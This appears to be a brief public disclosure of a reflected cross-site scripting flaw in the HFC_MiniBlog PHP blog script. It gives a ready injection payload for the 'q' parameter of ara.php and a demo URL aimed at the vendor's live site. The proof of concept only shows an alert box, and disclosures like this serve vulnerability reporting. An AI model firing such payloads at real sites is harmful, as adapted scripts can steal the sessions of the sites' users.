===================================================== HFC_MiniBlog php script Cross Site Scripting Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- site script :http://www.hfc-miniblog.tk/ dawnload :http://turbobit.net/whc8o1cwif2y.html rar password :www.scriptim.org (tested by Maxthon Cloud Browser, firefox) ----the script turkish lang---- ----------------------------------------------------------- Exploit: ------- site.com/path/ara.php?q="><script>alert('explo3ter')</script>&= demo : http://www.hfc-miniblog.tk/ara.php?q="><script>alert('explo3ter')</script>&= ----------------------------------------------------------- Zryan_kurd ,hamw andamani p4kurd.com -----------------------------------------------------------